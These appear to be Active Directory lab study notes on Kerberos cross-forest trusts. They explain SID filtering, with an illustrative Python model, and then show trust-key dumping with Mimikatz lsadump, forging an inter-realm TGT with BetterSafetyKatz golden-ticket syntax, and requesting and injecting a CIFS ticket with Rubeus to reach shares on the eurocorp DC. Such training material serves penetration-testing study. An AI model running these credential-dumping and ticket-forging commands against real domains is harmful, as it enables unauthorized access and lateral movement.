Cross Forest

Consider a user in dcorp who wants to access a service in the eurocorp forest.

In step 4 of the flow, we receive the inter-realm TGT, which is encrypted with the trust key. Once mcorp-dc decrypts the inter-realm TGT using the trust key, the user can request a TGS and then access the application server with that TGS.

Generally, it is not possible to escalate privileges across forests, because the forest is a security boundary. The boundary is enforced with SID Filtering (SIDs carrying RIDs below 1000, such as RID 500, are filtered; RIDs of 1000 and above are not). The TGT would be accepted, but the SID would be filtered by the parent DC.

This means an Administrator of dcorp cannot access the DC of eurocorp and escalate to Enterprise Admin of eurocorp.
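To make the SID filtering rule above concrete, here is a small model of what the trusting forest's DC does to the extra SIDs carried in an inter-realm ticket. This is an added illustration written for these notes, not code from the page or from any tool mentioned on it. The dollarcorp domain SID is the one on the page; the moneycorp and eurocorp domain SIDs, the group RID 1105 and the claimed SID list are constructed.

```python
from __future__ import annotations

# Domain SID of dollarcorp.moneycorp.local, taken from the page.
DCORP_DOMAIN_SID = "S-1-5-21-719815819-3726368948-3917688648"
# Constructed domain SIDs for the other two domains in the scenario (not on the page).
MCORP_DOMAIN_SID = "S-1-5-21-111111111-222222222-333333333"
EUROCORP_DOMAIN_SID = "S-1-5-21-444444444-555555555-666666666"

# From eurocorp's point of view, these are the domains of the trusted (moneycorp) forest.
TRUSTED_FOREST_DOMAINS = {DCORP_DOMAIN_SID, MCORP_DOMAIN_SID}


def split_sid(sid: str) -> tuple[str, int]:
    """Split a SID into its issuing-authority/domain part and its RID."""
    parts = sid.split("-")
    if len(parts) < 4 or parts[0] != "S":
        raise ValueError(f"malformed SID: {sid}")
    return "-".join(parts[:-1]), int(parts[-1])


def sid_filter(extra_sids: list[str], trusted_forest_domains: set[str]) -> tuple[list[str], list[str]]:
    """Apply forest-trust SID filtering to the extra SIDs of an inter-realm ticket.

    Returns (kept, dropped). Two rules are modelled:
      * a SID whose domain is not part of the trusted forest is dropped
        (that forest could not legitimately have issued it), and
      * a SID with a RID below 1000 is dropped, which removes the well-known
        accounts and groups (500 Administrator, 512 Domain Admins, 519 Enterprise Admins).
    """
    kept, dropped = [], []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain not in trusted_forest_domains or rid < 1000:
            dropped.append(sid)
        else:
            kept.append(sid)
    return kept, dropped


def demo() -> tuple[list[str], list[str]]:
    """Constructed ticket: the dcorp Administrator claiming several extra SIDs."""
    claimed = [
        f"{EUROCORP_DOMAIN_SID}-519",  # eurocorp Enterprise Admins: domain outside the trusted forest
        f"{MCORP_DOMAIN_SID}-519",     # moneycorp Enterprise Admins: trusted forest, but RID < 1000
        f"{DCORP_DOMAIN_SID}-500",     # dcorp Administrator itself: RID < 1000
        f"{DCORP_DOMAIN_SID}-1105",    # an ordinary dcorp group (constructed RID): survives filtering
        "S-1-5-32-544",                # BUILTIN\Administrators: not a trusted-forest domain SID
    ]
    return sid_filter(claimed, TRUSTED_FOREST_DOMAINS)


if __name__ == "__main__":
    kept, dropped = demo()
    print("kept:   ", kept)
    print("dropped:", dropped)
```

Only the ordinary dcorp group SID survives; every well-known RID and every SID from outside the trusted forest is stripped before the eurocorp DC builds the service ticket, which is why forging Enterprise Admin membership across the trust fails while access granted to a normal dcorp group still works.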

Abusing Cross Forest Trusts

If there is a service on eurocorp that is accessible to dcorp admins, we could use the trust key to access that resource.

Once again, we require the trust key for the inter-forest trust, i.e. the trust between dcorp and eurocorp.

Invoke-Mimikatz -Command '"lsadump::trust /patch"'

Or

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

With the trust key, an inter-forest TGT can be forged:

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:2756bdf7dd8ba8e9c40fe60f654115a0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit"

Abuse with Rubeus

Using the TGT we forged above, we request a TGS for CIFS on eurocorp-dc and inject it into the current session:

Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

Now we can access the remote system, for example by listing the shared folder:

ls \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

How do we enumerate which file shares are accessible to us?

net view \\eurocorp-dc.eurocorp.local

But this is not practical in the real world: for 100 machines we cannot request 100 CIFS tickets and then run net view against each one.
